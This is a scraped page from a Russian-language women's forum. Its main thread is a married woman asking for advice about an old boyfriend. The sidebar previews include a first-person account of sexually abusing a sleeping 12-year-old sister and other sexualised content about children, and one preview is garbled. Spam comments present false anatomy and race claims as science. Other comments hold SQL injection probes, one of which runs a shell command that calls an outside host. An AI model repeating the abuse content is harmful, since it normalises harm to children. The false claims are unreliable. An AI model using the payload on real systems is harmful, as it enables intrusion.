ЖЕНСКИЙ форум без регистрации

  • Я дрочу в 10 лет ? что ...
    Написала Мамка. Ответов: 26
    Мамка-автор сообщения
    Соня, го мне?)))
  • Как мне уломать свою се ...
    Написала кока. Ответов: 57
    кока-автор сообщения
    такой же вопрос, сестре 12 мне 19, она такая милашка, и жопа уже есть. недавно водил членом ей по губам пока спала, но не знаю как ей сказать что хочу ее
  • Сын мастурбирует на мои ...
    Написала Дайте подрочить. Ответов: 929
    Дайте подрочить-автор сообщения
    nata00, дайте ребёнку попросить что трусиков жалко
  • Я БЕРЕМЕННА В 15
    Написала Williammus. Ответов: 5
    Williammus-автор сообщения
    ????? ????? ??? . ??? ???? ?? ???? ?? ? ??? ?? ? ?? ???????? ? ????? ????? ??? ??? ? ????-???, ???? ????? ????-?????.

    ?? ?? ???? ? ??? ? ??????, ? ?? ? ????? ??-?????, ? ????? ?????. ? ????? ???? ????? ??????, ???? ?? ???? ???, ??????? ?? ???????? ???????.

    ??? ????? ??, ? ????? ???????? ?????? ?????? ?????? ?????, ???? ????-???. ????? ? ?? ????,????? ??? ????? ????, ?? ?? ?????? ?????, ?? ????? ? ????.

    ??? ? ????? ?????? ????? ??? ?? ? 2010 ??. ? ?????? ? ?? ????? ??? ?? ??? ??? ? 15 ???? 2024 ??. ? ??? ?? ?? ??? ????? ????? ??? ?? ????.

    ??? ? ?? ?? ?? ??? ? ???????? ???????, ?? ?? ???? ? ?????? ?? ????:

    ???? ?????: ? ? ??? ? ? ??? ????? ????? ????? ???? ? ???? ? ??? ???????? ??????? ????. ?? ???, ?? ??? ? ????, ? ??? ? ?? ? ???? ???? ????? ????.

    ? ????? ? ????? ??, ????? ??? ???? ????. ??? ??? ????, ? ???? ? ??? ????? ? ????. ?? ?? ?? ???????? ? ??????????? ?????? ? ?? ????? ???. ? ?? ????? ??? ? ????? ???? ? ? ??? ???? ???? ? ?? ??? ? ?? ?? ? ???.


    ??? ????? 2020 ???? ??? ? ???? ????
  • Я БЕРЕМЕННА В 15
    Написала Oksana98. Ответов: 5
    Oksana98-автор сообщения
    Лично я считаю, что в данной ситуации ответственность лежит на парне, может и прозвучу как старая одинокая "БАБА", но у тебя есть козырь, ты всегда можешь попросить родителей с его родителями поговорить, либо же крайний вариант написать заявление в полицию с предлогом об изнасиловании, если разговоры не помогут, надо действовать, пообщайся, наведи на серьёзный разговор, если нет

    -ты к хирургу

    -он под шконку
  • Сын мастурбирует на мои ...
    Написала mateus. Ответов: 38
    mateus-автор сообщения
    маму трогать нельзя,это извращение!потом будет хуже,пусть ищет девушку!
Женский форум » 24+ » Нужен совет » Любовная тема,нужен совет

Любовная тема,нужен совет

Анна | 23.04.2020, 11:42 | Просмотры: 15827
Хочу совета,и наверное поддержки...
Дело в том,что ещё со школы я встречалась с одним парнем,встречались мы 3,5 года,даже в колледже потом учились вместе...
Но дело в том,что ещё до меня в школьные годы ему нравилась одна девочка,а она на него внимания не обращала и водилась только с крутыми парнями,так вот,сейчас уже я вышла замуж,переехала в другой город,он иногда заходит на мою страничку посмотреть истории,а недавно и я решила зайти в его Инстаграмм,и увидела,что подписан он на неё и на парней,она одна девочка в его подписках!!Я понимаю,что я замужем,мне должно быть все равно!Но это первая моя любовь,и у него я тоже была первая!!!Неужели столько лет он не любил меня получается ?Любил и думал о ней?Тогда зачем столько лет было со мной быть,в колледж из-за меня идти..??Помогите 🙏🏻 Уже какой день не своя...Просто обидно!Любила его сильно!!А он видимо нет...
А ещё,я такая глупая....Вк можно истории выкладывать и ограничивать людей,так вот выложила я в Истрию фото в купальных трусах,фигура красивая ,на толстая,видел только он один!!И после этого на мою стр больше не заходил....Что же во мне не так?
Реклама
kilomopsa 24.04.2020
Белые люди некареглазые

Немецкие ученные выяснили, что белы люди не обладают карими глазами в истинном понимании. Оказывается, что в радужной оболочке белого человека нет постоянного слоя клеток, который содержал бы в себе меланин в том количестве, как у представителей других рас. По их мнение такое положение является ошибкой исполнения организмом программы по заполнению клетками с меланином внутренней поверхности глазного яблока. Как правило, такой тонкий псевдокарий слой не может держаться слишком долго. Действительно, много людей заявляют, что у них светлеют глаза.
nokolp 24.04.2020
Есть ли у мужчин влагалище?

У мужчин есть влагалище и оно представляет собой мышечную трубку подобную женскому влагалищу. А вот есть ли оно у всех мужчин современные врачи толком сказать не могут. Дело в том, что из идеологических соображений оно длительное время в анатомических атласах не изображалось и воспринималось как нечто несущественное. Например, в БСЭ нет понятий секс и клитор, а есть только понятие сексопатология. В анатомических атласах СССР и других стран середины 20-го века на изображениях отсутствует клитор и эпифиз. В США это происходило из-за религиозной составляющей.
Достаточно посмотреть строение мужского таза в разных издательствах разных лет, чтобы понять, что вокруг этой темы творится что-то странное. В том месте, где находится мужское влагалище, в одних моделях мышцы, в других жировая ткань, в третьих оно представлено, но в явно неразвитом виде. К тому же взаимные пропорции органов мужского таза на них сильно преувеличены так, что создается впечатление, что влагалищу у мужчин места нет.
Вход во влагалище находится выше ануса и закрыт тонкой кожей, которая однако, ничем не отличается от окружающей.
sbkwvyxx 25.04.2020
1'"
odkrbowf 25.04.2020
1;copy (select '') to program 'nslookup dns.sqli.\013405.2065-4497.2065.a7535.\1.bxss.me'
igdnvhhr 25.04.2020
1'"
Арина 5.11.2023
Анна, с тобой все так.. Просто ты сама не веришь, что с тобой все так.. Ну да и мало кто с кем встречается и зачем.. Сейчас то, что волнует по настоящему?)))

Имя:*